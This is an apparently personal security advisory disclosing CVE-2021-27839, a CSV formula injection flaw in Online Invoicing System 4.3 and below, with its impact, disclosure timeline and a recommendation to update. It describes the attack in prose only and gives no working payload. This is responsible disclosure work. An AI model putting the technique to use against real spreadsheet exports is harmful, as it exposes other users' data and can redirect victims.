CSV Injection in Online Invoicing System (OIS)

CSV Injection in Online Invoicing System (OIS)

Online Invoicing System is an open source web application by BigProf Software that can be used for the simple invoicing needs of small businesses, consultants and freelancers. OIS 4.3 and below were found to be vulnerable to CSV Injection during my testing.

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.

When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with ‘=’ will be interpreted by the software as a formula. Maliciously crafted formulas can be used for performing attacks.

— OWASP

CVE-2021-27839

Impact

A regular user can provide malicious payloads (formula) into their client record’s text field. When an authenticated admin uses the Save CSV feature to export the details of all the clients into a CSV file and open it, the payload gets executed and can lead to unintended actions such as redirections to unknown/harmful websites, while also disclosing other clients’ details that the regular user did not have access to.

Timeline

  • Vulnerability reported to the BigProf Software team – February 04, 2021
  • OIS 4.4 containing the fix to the vulnerability released – February 27, 2021

Recommendation

It is highly recommended to update the application to the latest version.

Reference

Written by
Jinson Varghese
Join the discussion